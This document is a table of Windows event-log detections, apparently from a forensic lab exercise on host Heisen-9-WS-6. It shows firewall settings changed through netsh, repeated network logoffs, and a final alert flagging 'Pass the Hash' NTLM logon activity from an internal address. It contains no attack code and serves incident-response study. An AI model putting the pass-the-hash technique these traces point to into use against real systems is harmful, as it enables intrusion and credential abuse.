&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-24 23:06:08 &#9474; &#8227; Windows Firewall Settings         &#9474; 1     &#9474; Microsoft-Windows-Windows Fire &#9474; 2003     &#9474; 1548      &#9474; Heisen-9-WS-6   &#9474; ModifyingUser: S-1-5-21-387158   &#9474;
&#9474;                     &#9474; Have Been Changed                   &#9474;       &#9474; wall With Advanced Security    &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingValueSize: 4              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ModifyingApplication: C:\Windo   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ws\System32\netsh.exe            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingValue: '00000000'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingType: 1                   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; Profiles: 2                      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; Origin: 1                        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingValueString: No           &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-24 23:06:08 &#9474; &#8227; Windows Firewall Settings         &#9474; 1     &#9474; Microsoft-Windows-Windows Fire &#9474; 2003     &#9474; 1549      &#9474; Heisen-9-WS-6   &#9474; ModifyingUser: S-1-5-21-387158   &#9474;
&#9474;                     &#9474; Have Been Changed                   &#9474;       &#9474; wall With Advanced Security    &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingValueSize: 4              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ModifyingApplication: C:\Windo   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ws\System32\netsh.exe            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingValue: '00000000'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingType: 1                   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; Profiles: 4                      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; Origin: 1                        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingValueString: No           &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-24 23:06:33 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 4480      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x9f7320'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-24 23:08:33 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 4488      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0xb822c7'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-24 23:10:33 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 4525      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0xd9de50'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-24 23:12:33 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 4534      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0xdb2c73'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-24 23:14:18 &#9474; &#8227; Windows Firewall Settings         &#9474; 1     &#9474; Microsoft-Windows-Windows Fire &#9474; 2002     &#9474; 1554      &#9474; Heisen-9-WS-6   &#9474; ModifyingUser: S-1-5-80-308807   &#9474;
&#9474;                     &#9474; Have Been Changed                   &#9474;       &#9474; wall With Advanced Security    &#9474;          &#9474;           &#9474;                 &#9474; 3201-1464728630-1879813800-110   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 7566885-823218052                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingValue: '06000000'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingType: 2                   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingValueSize: 4              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingValueDisplay: Private,P   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ublic                            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; Origin: 1                        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ModifyingApplication: ''         &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-24 23:14:54 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 4741      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x4a8a4'         &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-24 23:15:37 &#9474; &#8227; Pass the Hash Activity            &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4624     &#9474; 4745      &#9474; Heisen-9-WS-6   &#9474; AuthenticationPackageName: NTL   &#9474;
&#9474;                     &#9474; 2                                   &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; M                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; LogonProcessName: NtLmSsp        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetOutboundDomainName: '-'    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLinkedLogonId: '0x0'       &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; LmPackageName: NTLM V2           &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserName: '-'             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; IpAddress: 10.129.242.110        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; KeyLength: 0                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectLogonId: '0x0'            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x54b3d'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ElevatedToken: '%%1842'          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; LogonGuid: 00000000-0000-0000-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 0000-000000000000                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; RestrictedAdminMode: '-'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectDomainName: '-'           &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; VirtualAccount: '%%1843'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetOutboundUserName: '-'      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; WorkstationName: '-'             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; IpPort: '37788'                  &#9474;
